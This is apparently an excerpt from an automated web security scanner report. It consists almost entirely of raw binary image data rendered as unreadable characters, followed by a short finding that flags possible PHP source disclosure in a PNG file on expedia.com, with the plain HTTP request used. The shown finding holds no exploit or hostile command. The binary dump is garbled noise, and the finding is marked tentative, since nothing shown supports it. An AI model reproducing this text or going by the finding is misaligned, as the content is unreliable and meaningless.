..j`.....J.i..x....S..r...J..=+.g..}.Nz8.u.u..t.......j)Hs...bh.."...j..[........(P.....z...%T..Y.5.S@M.2.Un.........p.0..5...._.9..B{dP......pM..w.&...J{U./.9\....;...#.......ZK.....In!.=..q..:....h.. F.T.lA:K....-.../....%i......w+.'......$l .p....e.s.t..h...E;.sD..5...)..$,..N...<w........b5....Z.. T..HT.P...g.s.1.G....&..l.....3.8..=.rU.J.%..]S._.*.....Ls......:Q......:d...........w......d.2..........w.,S6.L....i..n.e.P....`../.Q`..}$]!.l.......*..^...a.n..s....=...&u.e*.s.O...g..m).
Wed.....r..=Jq......b..C.H..v.b.......0~...R..z=.....{......4.2..+k.Q+..rP.Sz...3.h.:~b....W...9.'4.B.......6............m8y..*X.D.Z.h...}m..Z...l%..X."x8.w1G_.....
.:.].9.-.....m..Q....Xw.......;...?....6L...=.11..o......Qt.wp.....A~f.....jG..    w.
:..c&........u.F\...@....N.2..8T..J.s..;&i26"... .....M.....o..|=.@..m.q..b?.C..g..' 7...*.p|..#d..6.[\[.......BY....z.Y...!.}pKH........=.K.p..}.1l...0c..F6....?.Ddx.s.<8{A...l-[.(8....7.S....W..%..n5?....1...rc.>.A...6x.9s......Hn.........9.7.H.~.S..&K.,|....w7.Q.P......."P;/M<s?..+^7.c..w.E.C}G....Q+...'....-i......9    K6M..x<...b_.f...%..D;..Ru.w....Y...w.-..P.....k|G.......?....^.?...)....X[.......I'.wLC..J...n. .O._....*.`..D..f>>.....>..#.....O.{.G)S..|*.(.7......4.........9..Dp. ......A..c.v...(>..f,.Q..%........
...j.v...... .3.Ca.%._B..:..Y..
"..    .m:..{C.+H....BG..W..9O.d`.!..n..2..Q.......M..W}.....    .0...O.....1..k....y...}...*J...>.s.@.'x.I.J...@..y.6../uG....t.#.....z..?.y...aq...
.. G..m.1.....O.K.t/..iM....k.w..J.o.S.,......&b..?.nP..gs..wUk%ZLB.nhwuo..+e    ..J._....u......p...L.?oe))U]X...w.c..p..............bm.....7..1.......vDc.H79.]..#....t.B.....Tu......'....}.r._.j.%...A!...;Itm..P..YN.\.l.Q...3.t.E.'.3.5s...`.o&.k.....U@.1.;......X.b]_.0.^..G..{O....X...Sl..?fl..q...p.N}\.....y....rV.h].........)-0..9..1h=...sI(..j....j4...;....YWv..h...C....Y....    F..e\.bt.*..%.x;],.H.!...3v..|.c.&8..6...O-v..1.]~.+L.r..J.....g...j........=d...H...TUJ
p`.Ib........F.........0w.1...........+..........8k.gi|.?<9.V..`9.Xi]."..L-T...i`ePr..9iF.j..(X.I@..~EV..ub.X.....V.<...OZ.F.-.i.%.dmGP`sm.7..M....".8...u..
....Q.W.f..m.....<.
.'.Z.....M5...U..bP..K-.L. ..J&R#.V.?Q..X....tC.[c/P?...X......./L...c..".X5'W.......?..&=2...h"/}.v"......u1.....e...X.+...X.M{...#...1...K.Nt?uA.....a.z?.7....:Y....l..8.g.X~.srv...4r.H..M5....6t..:]/f.j.UD..K....JAWz.z...E...(F....3\..u`.9?;;8.e..T.....E....q...Z"........y&Z....H,n.RB    .z-b{..Xi.r.$..n.....0GsR....Y.6...nM...|^...w...:;...q.A.'s$e.Pn!.....*/....1....}z..EG.~...z.g..9.\.Xp.
..?.=.).g..}.o....1.V...n..=.Z..Ap..w.....V..1Z..U.W....Q..)\.z..rE..............4....r.*fO.n..:zF<o.._..K.vav.B?..L......F.<.f.}=..w.....V....leg.d;`.}....hh>.2.C.WM..,.%TD..(Ex..fA.j..:M.h*S5..&......U]%.*v+&....YA...........k"..9...... .Iw.....w.e..$.U.C.{z.............c...Y&.O.i.G.]$...\G..\'.....3    ._.]....,,s.C....U....xdKx....g..p...|....Y">.6
.SiZ....L..%..b.K...".C....3....q.6TW4.e...]..$0.....".....w...
Js..c...v.........IX;.4h..7Z.....
............0...{{..hc.g...g{......(.......(...q...!d..s..]V..R(...e8....%.=N.HkN?.-X......W'O.K.HT%Z<.0..@. h...........,.B.!M.$.....k..3X..g3b..i..N5d..=T<.]e..:p.[?)*.3>...,.I..At..6Rm5w.?..e@A.'y........?.<N..`.T&..D_.9}..9...eH..-c.....    .j.5.U....b.B.J.`..3..H.....|$...,..
.4
.....~.o.c.j*..M...H.[NA@.L....:....n.2L:..csl......x&.hA.,#.\..+Fe..7]8...P.......C..h&.6W9...i.o..<    ..'..?a.5....E..X.U..............VI......J.......4.\ML...?.qr..........00.....!.>.foV.O+.../.{EcB.?..}.f;..Na b....=Q{Q..\..R.@!....C#.)...I..J...W2.mk..........m.........D....'...;.....rO...R?.flkW...w...,.{#...D..h.j..f.............-..`c.o`;...)....ny..8.}..9.2&.E.w.7\...(r..vA..........R.......SQ.f....]$..Q..H.f._.Y..T.}...t.=2....w..V....7..s.......H...5..."....?..^...2*..n|l...;.(9|y.-.w..=,g....u.c...".M...&\%.;b.'X.....~)..5...,.i...+~XHx...i...W...F.o.l
.}.W...'.n........U.....b.>{R..\..")...=F...)..(iL......qD.. ~....|......["...DI.s.C...R?.9.P..A."w.}...y..Q......~    ! 7.^js.L...t...;4P...m..*..$.~E[......b..Tw /....]...FW."0.'0...X..O./.....=!..z.<.t...7....R.w.[Y3..AE....Z_Rh.m..k.....0;;*.[..I...mJ`..C".......S.U..D)..*. ..bk...3./...>J..R..Y...fV.M.E..<rl=.-.A`'....h.+....~.i.(.##...........AK....d.>...9.0.4F.IQ..H....q..z.OPS.......F.w=..D0b.z......R+.~__.}...j.O.......fk.f.-.zs.`..l.._...@S.e.%..?^h...H.F.J=0u.=H>.=h...!..0W. ..C.(.
b..uBZ.8.r=ku4...:....mVB.)\..1.5.&.9.F.&.@.Nx...=.F.?Q.F.TM.7y=*.....~5b..56.........X.rn..g..W.ns.{bi A...7.&...U..rm...1...v......_.km..+.....b>..M55..D....."M...Y..-.(?..$.i....q.'..|...p....X.......[..S..+}...q(.).a...]..Vg..
.]O..<...
....i...G.Ts.    .....9t..H4....c......9..e.I....1"*.Y.. .Z....F.....u.m.?.    m..m..n../.{..vcu~........Y-.D.0* .=...$$....E.|.gt./.$h.n....qFH.b..<w...!...!......8:h#....|.s5.$e..U..W.I.\....~.@f..    .=.T..Vl.    p*.....".J......0a.2(ax...    ap.,.6.w..^.`#....c...^I[y..|...kh.T...H....(..H..{$..................[,.T....r....'.N.......yBPV.fF...:.J.E.Qw.yc.=KI.A.|....2=...<..&.q...l..>J.........#........v.xbcB..*.da..F.....7.b.\;.c...z.TA.Z[..;,.-..j...+@.(.i#Fw..$.^2N..*OL...Kp....LzE5...U..!y|..~F......H.....~9.2w..f..#.Z../.L.n.9.I.....`D~..)(<.R:........6..K.....Ac"f?..fx^E...>....a.j.^.d..\..%..............".Fi    jX[.h..z..T.K....$P..@.....d.........*0?.V..)o......_.../$...tZ=\.9..    .....+Y....c....c.=Fd/.....S~.RB|e.)_3.....(a) ..A.T.#.S...3..    .">.z..:l.....O+[....... <........|{6..9?.q.w.w.|..B.e..i....l3_.hl.........m.....2....Wf...BT0..m..$.,...i.).....@[.4.C..........e#IV.pD..SJ.I6..I...s....g=a.J....@.l.O... .....Z.....aJ.;b....@U..P..............[q{...-+{..&Imb....s.x.}.....{b.R#.=..$i.....8J.TN....OV.,.b1..\Q.l....sd.!}.../.....D..@.1...$.../........F.z..b.sR..b.l......+.:..7...."..v
....
#=....7iZY.l.8...c.....Q+..oqN-t.....%...,........z...x......wy.x..2>j.'g..u.v.w    Zfk..^.+.$..T..I.t..F..7..S.....'...)..U.k"b.9..x...R..O.g....2Z.....Mr.+.sT.S....p.....j...}...GU..g.....W:#O.....zWw|..A?...............%.....0..>t.......7Jx.&.E.....}.w ...... 5y.T..0s.O.d.X.`..Q.............{..'b;P...j.$..sU.z(X.....s/...h-.x......n....}.z...y.3. ..2L..i.].`.....oQ.>.....~ .1.........[.!W7.}.B....G.Y..f8..9.P}}.:..D..u..t0..........0Sd...(.1.4..m=.%......R.e.....]...[.7.....)-.......(.0.... .h~V$t"g.PII..............o..F.
k)=......7..8.....|.J[...zw.9.&.>L.G..(....%m.K...G
...<
ph]..z...    .YH.>....V...jz.
..hC.f..[.."r.r,..i,.d.M~."..%S!q$-..p6./.V.......?Y.Y.a..l..@N..V.:...3}3.L;.=.....9..S...7W_'v&J."...g..
..4..r>..%p*....    ...HP..1..........@F...oH...;....+....N.s@.@q....!H`....%w.@.Z.S?..    ....?>y.h.......U.Xm...N?......O.6..x..f......._....K<..SNq..L. .Rmz...........fm..].o.........t;..........X..c. .
......bC...{FO"22c...T...\h..$M..........E.0F~......]p.j..l.|...b....r.d'.s..k.......ANX!.Z.....w.,....A...Y^s}..#..x..B.....C.q.n.......}.d.R........v..Q..8{i..r.........7>m.Y..te..t..{!./.A..~.;.2...
.M.I.,..&4|.[.|)...,\....- ...s.....O....m..|[.....n0...}-4....]lb..+..y...z.v.jo...hY!....U..n.TR.5..;.........f...\.'..R:..S7...2..Ym..?.i:..p...`sT..kB.R%9MA.S.x*...Ul.....X?..{.].....-..U..s%..Hq.,....]....!...U.......?1q.........?g}.......K.M...0.t....W.&......Fl..f.z.|...UR.Q....&fD.'C++.xXWuF.<.NZ.Q[h.'....*o..#7.k.!.=..S.dL.j...D    +..53C.rTa...!...m.'.l..~.....2..9..4".<.........R/.z......R3t;/.Y.Y....{!Z.Y.p..j..u.lZ....^.|..Y%...=...tp.t...\6.R........,.Q.#ij.....MMoam?M ......U:.Qy0.i.5.....sG.....k'.0......>...LT.iaK...0......-ZZ.}.0N.(;.T.<....'.....!'.H..tX.T..z.q.x^?..g...oiL`x[.....L....\/........t........Rv..L..y......'.:.../t.A...;V98..k.T:..S.r.t.*..9.....dN....s..p..U.......!;..].....F0..f1...Y.
....!..Z....*/.C#2.?.....k...f..$|8.0.......3k....v>`...M......]..I..}C...,..DP.-7.xY.\.L..
.\.8XV..[....l.~..O..Wz?.z_.b...2.\R:H\5.GQV1....jW.L.*v..j...#6....U.G..t.+.7*.......&."..O...v...$~-.-u.....9.IY(..X>\..X.+.....=)n..%g;.|_.../@.../.f.5..~.:...n..6o..X.N.wK.i
.......|.[...v..&..N1f..&....:1..2..F/.q...k=._....^p......R3..S....0.....t...H....?.+~.!..4...!..m.1....F.~gq    .@T8..5D.O.nA;.<..N.~...V...L.t.2auZ.vd}+y..f...!.....}3+....J[.....+...+3... e....:...H.N.a.q"s.......L.W.6*N`a~.7.-.n....`...-.#wC..9#..0R..\...    \..d{..F......%2U.8|.(..V...._...91_.n................c[8.tf....d."..~i...{..2.)n7.X..r.v..w...../..l.}t2w....O.....b....p.........cJ..g[..L|......e.....U.....v..........h..s.,...Y_{(....U(;O# AeD.uq?.K..#.E....q.9..........}o..
U.*g.Y.V.5.....M...0...................0\.K_;.|..*.s.V.b.:.#..z.....W.8...... .P~....&.6.......n.2.U.bv.NA...5i.(`o.1..R.k#.Y.8...........RBz.*a."...7.d..e.!.q."]~....)..H..o..:N.. ...M8..:..z&Q....-.V.k...u.....rR...."sP.....~"~(.n..g.w@)..ar8.=..?.g....D.l..{*S....*..Qb...]..v.......[..........B.G.............8x6...:}.._...K.p
Q....p.8La..e|....z....pz._X.*>..A..B.zi...L.B.c<^..0:...of..wVbQ...9...J.:ty.    ...Kz.o%    .]ImXF.u..c...?}..5st.........P......B..~8...|k..._aK=.A.........f@KH..<9K.K...A...}.6...HN.1.1B....Da..T..8`3*.....pW.s..c.......\.p....#.n?.?..|DU..%......'.2.v..QJ.^R..)..6....../......{...Z.H./":_...'.....%........-W~*....G.+..g... .4................~.Sn..>..i..(=.Q..R.,......"aHAl..Z.yGE.!8...a..    ......~@_S......[Fhj.......1.{.oz....H6._M....@.
.5....tB)c60p..<..A.....P......s..(u...@....j*....g..
...#>.GO.W.?...F..v..oi....0......-.K..?.'4..V.93.....`.:U...m......=jSd...A.yZ.}Z/.@..Q..>xZ.1.?...BJ....F:_+#....@..4.F.Ku.............b...Z......_...:........I....t...<.=..,N..(u@.M....G...*.y..u..0.T.e./..-ateO2...h..
.......!.l....D.fp@
...,..{....7.......E+.........t7....f ...VaB........3s..E....
;......mc........7....-..K.[fd...z....Ie..O.. .....D'0.wI..    .........h..{.q...~..|.g.R.../s......ZG
...Hl.z+yk.gA...t.L6....R.&...rfk.A..%cU....<....mTh..tM..j.....~L....    .:......h...    =..:T.....0..v.......iz. ..A...h.,Mc&.3.e ../%E....w.^.%eOq..................o..r.L..i....Sa.z,..;.......7.$..Q    ...].;}    x.`....6...%Q).r5Mi.jC.wJLgw..&........q..B.].O..m*.o..
..........9{..P.l..........Rbf.J............P..C.T.+.pS.-.+...Dp.B
c<.+Z... ...l.....%.%.....-..9..Ln..-.'-.y...I.......5
...Feh'...-.(...(s...+..K...".s.B.:Jtu...eO.sJ.A59{...G\VV..h........ay:f..t. ...f..}...7c8...I....]...0.-..n.../..+w.NIo.t...<..c..<F.).1*}..._.L......<;....}......U+..5*.l.t..1.V.p..6....a....`.).!O...V....b2s.......w<^.e.....U........Tw......KZ....<...1...=y...l.........(G.5v.........&....y.}.....-.%............q.P
..A../h.hU....).......iN..../3.).p....s...y
o.$.h./......c..Sm
.P../...9c.G.S9Mj,ZZo..V.Bd...."...;......=45.+........Q$..E.m.B.$..*1.....    &^-0...d3.q'_........'.f5....B.9>....
(.vy...h..A@..}..U
....~.Z........k.f5.........m.Z..q...............J.4>..*..+"w._..Q    .T\.......1?z..X......k,......L\..h}..1n.../. .5...:..Z.=-O.xV..ML.....kTw+..g..N......N%=uo    ....z...V.r....gh...CUc/..P.E......B<.d.V.$]*.........d...2....T....K....n..G....-.rw.<.....:..7.9.l.....    ...2.s.L=...%.TBW..Gd...N4..k.T./.;...d...d......V...>......?......5.B2....KN.V....k..8.Q.>...pR..
=+.4g....7e....P....B.U.G.,...........~...i......pwU.
.....U`.z?e....v....;.. .'w.0HQ....4...^..G....r2.a.;..6u`........;9..6"=..Y...#*.g..Y0n.y...........<O...)[.7.2x8;...    ..0Dl..F/    ....8o...5..Tte..aP....a.....8..0.%K}..k.$.F..6&1.&..B....)T.u\y...{*...7..{.ci..z    D..j......d{...U...j.}.n."..S....*/8u.5.R/.~.f./..S..b.j.%....V=.3.M..v.5.B7..Nn....~u..>..........L.|.I.I}>N>TL...
...Ao.":....F..d..y9NjG..d..Z..$4..}o.......).D    .k.....s:K".Y....._..=Al....>k<.....7\W.:.O.b..X._....|R.el.....!.m.>6C.-..&..u....<...l...Hav.8.nd.]..rh5.e..sF.i..I..M..t..(P..P.8y.....<./.{b..Vj...C..........:......i...yg7..........9`...+..e.ps....s.H.I...X#^A._.........-1...0%...Y..y\nTe.f.".`..<.. .CMb,..].\..xY=......0f._.!'?...B...^...U..3(.d.Y...m....e..Bw.J+f..v%).B....1.yuP..bW.L..X.B"k+Ip._..N....?%..g.6.d...j@ig......5...."A.zA.G........2...y..!..yC.)....J.........d..pf.3;...l.)....L..........6a.h......)r..q ..M..#W~D..|..Q.Z~..^MK.(..L...(U....H@.w.....<....Y..X......\.h.....C....... .{.DZ.Z......<....._.]..Al...0xNPP........a8P..2..2.;.H......p..B.0*...........F..u......^5S.....}.......y^.q-q.l"tP..r.W.....[...Gv`..J.:....p.b=T.....@...jY_.-.r    ...y5|..*6.=y}....uh_/e<^..c.G......f1.....n..w`I...l.Q.....0H:`...ks..P.0....p.*..f....lk....?.%....p........!..C3..v.h.g....F..V..(p.n....=...z..J.5.l..usy..-..\..K.....`JH8..RM.O._........d..zi.I...:m...^...vH..>.U7..q.q.4    _.\..9...FE<...H.71qo}9..&z5...Q<...p...].&......T.#...j.......
........^..4..S...!..b....... ....k..1.:..P.%ti.N......../.[....O..#D7..#..n..II.#p.[..f...'.......LX.l.Pt .....f.....E....g..{\*..um&.nFW.@..\..5.(..)3...1i#...8....v."i7.....u}.C..-}.......i.... ..h...@....@X...l...:/j.....~&...~y....Z..._.R......%.T.....d.u.yo#X_...a...8q...}yGQw|fj<..yS..."...Xp.q1....w......gV...*.W...ph.y.f.{...B..L......H...y$fPk.;9Q    .y6W........M.........Q%$..;.....j....\ ...e...+.I......BxSP.t..F.%.~...v*...... U.v$.......\..jw.<x...l.....8.p..j8.a..1.B..t......D.rV....mm-8ZV...6~.....4.(<._..."..^...Y.Cx...;.d.....[..%C#..o.o2.hU'>B...$...(.G.."..Sa.w...;'k.m..$m.......o.3d.    L.n    ..X.D./.|.)..a....SQ.'jWIp..(eh..N.    Mp:z...i.#Q..y4L.c.."G1K....a...H.s;_...f.D.....P.P...n.Hh#.....s....KD/.o]&..Y......Q.0...Lz.Ik.....j.!0ot...z....AW;c).Fh...e..H..9...\[.._....W...].{.z.....O..v....)..t..:^...Dx..>.:xkcR5...#./;.......Bc.o.lkD2q.z'.../..6.IOq........&..kB.......
..~.;......."SGU.IE....J.,P..DG..A....!...F.RR....".zuyr....d.....o......4*\.8.y.BX.=.Q.#rF..Y.....-y..X..V.. ..Y...^.N .,n"X.v...$L^.j..*.H.VG.'...E.z.9. c.\[.....%..ON.5H....l..    ...K....k+...*n=...,..%.`2...Uv..~.....t......................mFO7..Gs.9.0......s2d].AJ.zwnd~.......0`y{.. ..%29....|z..:h......8...-w:y.;..b...d.a.J..f..L..W.D....R...._..\.Z...p."..V.f.}...*..E....... a...V}.....n....J..<=..Y.../..W..N.X.2.Z...q....)....OF.7N.}^.....;G.Yw.A...F..%...^,.....p.I6..C.a..~.........c..$q%...R.G]...B..)5._.g`8.B...V..{....o_2.!k..R.z....ZXZ!*1~..d%...?)2..3...<..]......!M.x..?.....}h.b....m!...I_A.J.0...5...L&q.T._Z....vqXd.#.c......L..z.l.O..r;@.Wf..%.nC.......4..).2^X..7...G..s.w".h.;.z.|..^.4...-
C..R.../.i.9U....=.....uE..7.eV..l.....~......?...(.V...dUA..*.>5 .....+.E]..J..t.....9....Ha..@(.O0K..e[m[w....&....2/.......6#G..v.7an,....j..O.....*..p......b3... ..Q....dA..........h?%..9.{......e|...H:+.a.g.C....(.....0...Y..~..;..1^6O~.j"...    ....RsyHr........    `.Y {3-...........=^w...
F-......'...-.......gI.....:b.5..^Q.Y..*..k.2..O6?!..........}ve.Q8.OS5..p.a@..[..W...F|/.I..v(z&x..6..-...m...S...{..5YH.'.Y..0.}.'P.c....ri...    .......y..59.N.K.QZ.\.z.U......&.......6k.2..........mx.r.......<l5...h.........6D.1.o~...k.0.......X
.@.,..U?..>{.@(..2.....0m..X#....[U.......&.#U.V..+.z    ..2....Q.4.X...q..............k.....O..ZN...$.....~f.Wq.s...]J....tsN".H....90)..9..Ue..%..K .....w[QY.x..5x..?..b..,z....H.k'...7.{........t...-R...`yo*....C#.I..N..R...j..G..[. ..+.s.Zx.K..++.R.n.1.Sb1....Rz.z....D...A...!.m....5..;.....^d..T..    A.z......E3....I..Zl..<....C.z..:4Ivn...XTUp..>h.Q....Sd>a........(G@.z.U......TT.D.......$.u......SG...Q......'x...@...$.ls.((.A....    ........D.4.....81........'y.V.o....N.Wv .G.}.........x........H.XH(.x.....r....,..A..8.....K..I..}.8.....G"8..s......i-...y.......v..q.t4B.........A.l.].7.x..k#5.V.L..2...g...7......B....?.[8.    g.P.......hK. .Zo@.'..K">.qU.%.J.A%de...@T...{...`I?..s..B.7.1........]....0.*.....|.BCSNe.h....?./A..-..........gG....(....9...x......ti..&.3..{...[.I.Q.....`Z7.J....d./n.....K-.,B.DaR...:    ...M...H..... .........Z......,.%....%.D..Y0....t..nr..{..N.e_..-...k(...&..{.#.$.h1.K...Onz...1...ve..].e.F......2z.;.m..:k3..g..l4v.....~.MBl...]...&    ...>....V.d...J.')uf"[}
.j...'..:.@..>3.......i....8.c....J.....9.5.T|.)....#:....Z-7..J....6M.....bz...5..i.!.O?......D.B.Z@
...a?+.7..>...A>R3......$h1M....R.u.q.w.y..h+._.:.CG.=... ..DR.6&...|.'dN.B.......9.....O..M..Xk:.{.T....0.<....*....R..Qgl..4.a.I.........`.q'c.*n..n..... ,~e....0.F....+.WQ......l.nT1d%..).F..    Z....W#...T........arY..%.f~*\.DA.B.D,T)|...:5.k5..0..{o..JX.W..[..q.k.+k.X.%..qWxWSB.S..s.3m...j....4.
..A..6.t...O....z.......@......X.{.....Si.#....G............bJ..+..l..}...d.G.h......y.O.#61f.s2..g-....../$...NQH....^Iu..e..8....o+.Bp..*..V5...f.f0:WC....cq~2.f..>......X....=.~Ipf...D..U&I.2;.3+...h.3z'.G...$    4..E.>...Q}..P...A.2.?..9.t../............}.....8.>..!.f.Sp.O.(.......UQ]...<D...Q2......4.S......J......6...Dm.|.0F.y.    jYe...$..l.)o......[P.>7V.sd...y;.K..Bz.3.p    '.A..{%!l>5...S.c4%
.N0B....<-T......K..+..JL..E....m7...=...b.3...ybW.=....G....<..6.....5y......t.c%..w.)..od..<....... ...`.5e...{6.w.5JL...Y..k.t.9..f.........4l.sq<..+6%.M3h..1j..I.|..U...    f.b+?.}.eN=.9..p ..W..R9..p.x.nmKX..=.....L...T<....C.Tn..37 ]n...c..L.~p'.?..p8.*..3...<..'....Uf.k.i.w..#.J..uf8....$....)J.b.W..@.....O32....Q.u...VO|......M..@_>@9 ..d..v....1.2..........S#..r..G9E66.....3.<.q.....5..C.....$.a%.....0.I    .E?...#VX..s.._....:.)...4%..M....S..u.ZR[O.Y..;t.......!$......&(..UV_u..X6....CV......(..zL..h.................3T.}....u...j.s.^..5C..}6.....p...S.'mH..*6!:(;....ug.o.R.:<....#%.1d.b(..3X.E......v%.q|`......vo...L...I.-......uj.....Q..s.,-...6.*..s..=U.n........L........NVP...U&.Mzal......!K.X.q.&....M...&[.s7. ...N.R.#....)...aSQAQ9L..AH.q..!d._.d...x..1r.0..u....=..uW+1.......fX^.N...\..n...D.C.:.f5^.q.../<.!.f...>.Bh...s....I...\...NbYRQ......3.xZ.....e...7.Oj...~..&<".."..-.....a<O|.X>f.j.0..4...
1..d.1.........Y..].w{.o.02..DE..`..C.v.*.N.[u..a...j
1.q)...8..._a...D......"!...oD0$..,.,.......J..(......X....s..N...g.`....R?.6cc...bdE.x..8.r..uU..J....I.OE.....Ua...$M5.3.nes...\O...WR.\e.B"Y-.tW...+0...[})0H.g.3A...=....C..l..+..r...Z.W..>......[..~..g0.MC........RT-.....2.fW'.."K..RV....F.c.V..X`.....L.Uw...........cd9..h2M.x..u.i.1`...AX..Y...R....~.l../$^.*.Z.Y......Q.............}UJp....Ic.l-.>7....C......s.w[7XKI..`f.M*.W.1)...
i..b..._r......4NOoP....tL'V.@....gg.,...J..(..,Rbs"......sQ3.....s..F......>U...N{.I..=".D..Vz_........-z.i'...........%..Tp.d..:Qw.. .r..U..S.=.kd....Y[,. &.    |Yx......s].".....lR6...Brt.N..dH=...Z......._    ..    ..6.`..{.u.%.p....-5...e...{WM.....('Wf._..SF.<.............A[.....U.YX.( .
......JY.....yX..!......K...[e}Qu ..L...7TG..Q.|s......8 .0T.G"l    ..B....85.......bge.:......Q$...
.a...,S.Nq..-.fb..D.X.#.......O    f.Y8.Av.../p*....o..)..f_.`R..XG.z...7.B......~.....g...~..2..S..Z;4.._E2.w.G......p..c..l.".c.
..i..q9R@..FJ..)|y.q.w.........adc..........,b.....A....?.q... !.>.N.o8".m.L\.1psP..il.....y.e?}hE.M}.po...Z.|......>..x..}.@Y..Vv.......Q...0.AG.e...Z>8.........1..z.R..!.W..9.C........(.w..j....`...x.?Z?......bTP...m..B.Y=..M..a.....@.B_.a........4.xWQ....Q.>N....b.6.Vi.4."G.."....~...}.w_... ......i.....f..=./.Y..x..6..GF..Y1........6..C..}iZ....g....N.~0.M.|yfD..U+...0.If..b..kQ5,X.woX.b..._....`.e.`..0
......@.6.....vQ....E........gk.e.>...T...,....q...........Z...s.....5.Sv.pS.C.;5..2K.....I...s.~j .^..:.1w/..r...zX....Z..;5......y.....&..RXX..YQ.......?>p1....v....+.Dm..........\...{.X..^.1\.?...i.{...(X.//.e,.........!S.{.c.Rz..T..UJ.........-..F..E...,68.IH....$P.Ly|.q.m.....m.....bw$.tui/,s.uqZ...r3...1t.k...    ....M*0-.....XE....k...f....!..K[.V......o..l[......`.sn.$......,..6..p.(oCD...%h[...3{<.K..G6..Z.Ov...FM*B.......A7...s*Q...........SD.....:@.I..5....ne..wK.c.....K....y...X....TH7..C..8..6&..(rJ...|^..n.p~.... ].~. ...@.-........U......i.-..G..,.S.....In..J.y..6..../............@KT.[A..Q.}.......kTt.f......N...[K..ui..8.5..T.C.*.e...F..]...N.2$.6WzDz..u#*.o...t.......H#....,..p;...bqS...%N.......n..>
=w9Bc.EI..Y...+.
......_..'.j......^...X.d......va89;f.^B#..ED..C..\<..i.....W.e#..;.A...@0L.LN..H#._.$_..
==...c....!.?.4n..B..U(/ch.......6.[.+..m...l.G.1.....;..0.z.z{......tn*....N
."....6.#C.:.z.....g.......p...n
.$..].b~..rMH..E*.W...bbq1.T0-.....*IT.!..Z.4.....^0.ie;J....pH.Q[.$.1.'.|S.t.......'0....6.#... atx..r=Ur...kz....t..A.{0w#....r..'C.tuqS. ....a.C........%............]6>g.T.a..(.BHD..x.:.......sH.:.........I....    ..n<Vu...5y..7..P.uQy..N..6wu....i.h.Ve.    .caK0.N?J(G.........L...q~..".K..M.i.......po.{.d..........[>.W..G..A>...OY*4.=.H..w..6E..>h..:E.:....z..xtm3...0.c..s ..&r....:.o....r)x.&..s..te.Y.(............:..as(.5....w`.;n#.G@.G...o0l..}..L).i..I..w.I.7F....yw.Y..D.zJ..?7U..T....H/......wK...9....S.h......x.:..pL..2#s.9.G...D..+M.....z....&..@.Q..K.'...H.4f..X..%..M.>d_S.<=._.....[...W).../..y_......R`<..04..uB..^.a...|.. 0=2.A..q.}O ./q...eO.."s{.Gx.2..S.5F.<..6..$.).(Aw.9s..........6.w....:qhd....H..(....).^....|..
..i..\..........}..#..x.m.........3G...rl.9F.7\..|OP.........`.?...S,x...._..h."..w.....=.......jS.....:#.#Q.]C..(...}.... .e....s.;...>...\..<w....u..H.>'..=.
.-.n..T+.MPi......V. .......Tv.....).....Z.YJ...9..g.l..z...J.W....V..k~ez..sue....a".r...P...D.........u....g#3...!.."%J..I.....QjM).3.Tk7.E!...>..S...v*...
^..%'........r.v=.'y..5$.*K..'.fc...G"b    ....M...>......p    .=.^.%4.*....h@m.I....+..s...A......G`....A.S.P....48.i4.f._.:............y..fe......2..<...D.....4..Q0.u.b=X6LC..o{v.._...@.a|6..5..f.c..-=...(...>........*e.x~d...    .....]......yr.M....=F.Z.pM..
..<..4#a:.........k.....U.8....T.B...[....@...,O.......<..n.B.\]...k.....*:..b..R.a....?...7r.Bb.l.....\.)....;n|........    ..._&JY..hm..    Dkm...,.c\...E...... W.w...N5g...h.........,....)p.......i..*ht..a.O./..7....dT...s.....r.TN..G.h....c..%..CZ!.F+.....H...u......&S..7..........<..o..2..{
q^.P.M...&P.Z......,.w5a.Q.h.z...R.......1...n.3...hZkH..b .b..D...-}..?.~[..r.32]*8...k.U.?K.%.3t....p....U!r.j.....@./LL....i......Q.('.'..f......p..<.w..f....._a<%..L.X..H..0.?N....S.1.......H..    ..x..).]GBvm.^......V.....WFq}6...Dtj3z..}.r..%7...E...'j......._.-'.E..d.f.M.......8/.P.Ex{.....3.Om3n.....\p>..g)E.Z.4"7.b..i#E...k wBQ...W.K..."........>....=!...*T...X q.... t...5j.a..\>'Ju..c\_.c....!    $&...z/k-...d..L.u.....2.8...brRw..[P.D.C..L........
.W...h].~...s..X
.....{%%.&.}..+..a.......}..,...>.....67L...p..0.oH ..C.+.^8..;C.w.G......B.s..W&.HS...~.h.s..p.x...".....    ..?..:.j.z0qH0.m.Z
.+..%..R.m...U....:...ce..>.7c.{.0.^.u_h......MU..,|x...5.....z73V..S;E..Z!.}e..>c...........].ffIV.....KN..&V..~..M....n).9...>.0!.....r~i..:.{.0...v.....:..$.8...K4a....id.C...'.r8A....
.).W...{_.2..v....u%..D....2......T...AC......9.......cFU........R....:..g.~...!).....u94wK..r%.:b...@..G.......|z.I....}......).&#=/.....    .q.D...S..X.f...+.Lj....HP.].F.;@e..:..-...{.....B.m.R.j@;.Y.O.dh,..,o...<TU..;...0.P.u..A../.X_.6G]D....u..Y....[..Z..b.o?.=.I.#E.......V.p%>.~..w.f......r..Z...0.z.....a....mY..'Y-.7..}H.f...
.-.E.mp\..?.2b.I....X.|0...k.q...b.....;.........F....y...~-U.f..acV.4U..(..5.ci.u
...+........0..-..[k.h...p[cv....Ln.H..=..g...SX}...C.D.b-w..
...[SNIP]...
20.2. http://www.expedia.com/static/fusion/v2.3/images/buttonBG.png  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.expedia.com
Path:   /static/fusion/v2.3/images/buttonBG.png

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /static/fusion/v2.3/images/buttonBG.png HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/Hotels
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
